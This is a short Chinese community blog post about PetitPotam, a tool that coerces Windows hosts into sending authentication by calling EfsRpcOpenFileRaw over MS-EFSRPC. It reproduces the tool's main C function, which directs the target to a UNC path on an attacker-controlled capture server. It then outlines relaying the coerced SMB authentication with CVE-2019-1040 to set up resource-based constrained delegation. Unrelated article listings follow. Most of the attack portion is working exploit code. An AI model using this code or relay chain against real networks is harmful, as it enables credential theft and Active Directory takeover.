AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

PetitPotam——另一种方式触发Windows主机认证

2023-10-07 121
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: PetitPotam——另一种方式触发Windows主机认证

https://github.com/topotam/PetitPotam

收到GitHub推送看到了一个新工具可以触发Windows主机认证请求,

通过MS-EFSRPC协议的EfsRpcOpenFileRaw函数

查看源代码:

int wmain(int argc, wchar_t** argv, wchar_t** envp)
{
  wprintf(L"Usage: PetitPotam.exe <captureServerIP> <targetServerIP> \n");
  handle_t ht = Bind(argv[2]);
  HRESULT hr = NULL;
  PEXIMPORT_CONTEXT_HANDLE plop;
  SecureZeroMemory((char*)&(plop), sizeof(plop));
  wchar_t buffer[100];
  swprintf(buffer, 100, L"\\\\%s\\test\\topotam.exe", argv[1]);
  long flag = 0;
  hr = EfsRpcOpenFileRaw(ht, &plop, buffer, flag);
  if (hr == ERROR_BAD_NETPATH) {
    wprintf(L"Attack success!!!\n");
  }
  return 0;
}

第四行向目标机器RPC进行认证返回句柄,然后构造参数后直接调用EfsRpcOpenFileRaw这个API

老样子,认证还是SMB,是带签名的可以配合CVE-2019-1040进行relay操作,而且在我测试2008printbug用不了的主机通过此工具也可以成功触发请求

然后中继机器收到请求

成功配置了RBCD

文章标签:
Windows
API
关键词:
Windows主机
Windows认证
1508026077072612
目录
相关文章
1227507367497292
|
网络协议 网络安全 虚拟化
解决虚拟机安装windows7无法与主机ping通的解决方案
解决虚拟机安装windows7无法与主机ping通的解决方案
1227507367497292
1003 0
解决虚拟机安装windows7无法与主机ping通的解决方案
rqbarzitsudte
|
监控 前端开发 安全
CentOS7 部署 Zabbix 监控平台———监控网络设备,Linux 主机、Windows 主机
Zabbix 能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。是一个基于 Web 界面的提供分布式系统监视以及网络监视功能的企业级开源解决方案。
rqbarzitsudte
1292 0
CentOS7 部署 Zabbix 监控平台———监控网络设备,Linux 主机、Windows 主机
无代码Dev
|
15天前
|
存储 负载均衡 Java
如何配置Windows主机MPIO多路径访问存储系统
Windows主机多路径(MPIO)是一种技术,用于在客户端计算机上配置多个路径到存储设备,以提高数据访问的可靠性和性能。本文以Windows2012 R2版本为例介绍如何在客户端主机和存储系统配置多路径访问。
无代码Dev
57 13
如何配置Windows主机MPIO多路径访问存储系统
码农飞哥
|
4月前
|
关系型数据库 MySQL 数据安全/隐私保护
windows mysql8 安装后 提示密码不对,修改下密码认证方式就可以了
windows mysql8 安装后 提示密码不对,修改下密码认证方式就可以了
码农飞哥
1086 3
想飞的雪糕
|
28天前
|
人工智能 JavaScript 网络安全
ToB项目身份认证AD集成(三完):利用ldap.js实现与windows AD对接实现用户搜索、认证、密码修改等功能 - 以及针对中文转义问题的补丁方法
本文详细介绍了如何使用 `ldapjs` 库在 Node.js 中实现与 Windows AD 的交互,包括用户搜索、身份验证、密码修改和重置等功能。通过创建 `LdapService` 类,提供了与 AD 服务器通信的完整解决方案,同时解决了中文字段在 LDAP 操作中被转义的问题。
想飞的雪糕
25 1
路边两盏灯
|
3月前
|
存储 安全 网络安全
【Azure 环境】使用Azure中的App Service部署Web应用,以Windows为主机系统是否可以启动防病毒,防恶意软件服务呢(Microsoft Antimalware)?
【Azure 环境】使用Azure中的App Service部署Web应用,以Windows为主机系统是否可以启动防病毒,防恶意软件服务呢(Microsoft Antimalware)?
路边两盏灯
31 0
邢仕冲的一亩三分地
|
5月前
|
网络安全 C++ Windows
【Windows驱动开发】(主机)VS2017+(虚拟机)win10系统------双机调试
【Windows驱动开发】(主机)VS2017+(虚拟机)win10系统------双机调试
邢仕冲的一亩三分地
149 3
游客677xsv64z
|
6月前
|
弹性计算 Ubuntu Linux
2024年Windows/Linux搭建幻兽帕鲁主机教程(超详细图文)
幻兽帕鲁作为一款热门多人在线游戏,为了给玩家提供稳定、流畅的联机体验,阿里云提供了高效便捷的快速部署解决方案,本文将为大家介绍阿里云一键部署幻兽帕鲁联机服务器详细教程。
游客677xsv64z
104 3
旺仔樱野猫
|
6月前
|
弹性计算 Linux Windows
阿里云ECS更换系统时提示主机名不支持windows镜像要求的解决方法
在阿里云上,我们更换ECS云服务器操作系统镜像从Linux镜像更换为Windows镜像时,常常会遇到提示主机名格式不支持windows镜像要求,这是什么缘故呢,那如何才能更改这个系统不提示呢?下面给大家分享一下修改主机名的方法:
旺仔樱野猫
581 0
非著名运维
|
运维 安全 Linux
企业实战(18)超简单实现轻量级开源堡垒机Teleport管理Linux/Windows主机(2)
企业实战(18)超简单实现轻量级开源堡垒机Teleport管理Linux/Windows主机(2)
非著名运维
133 0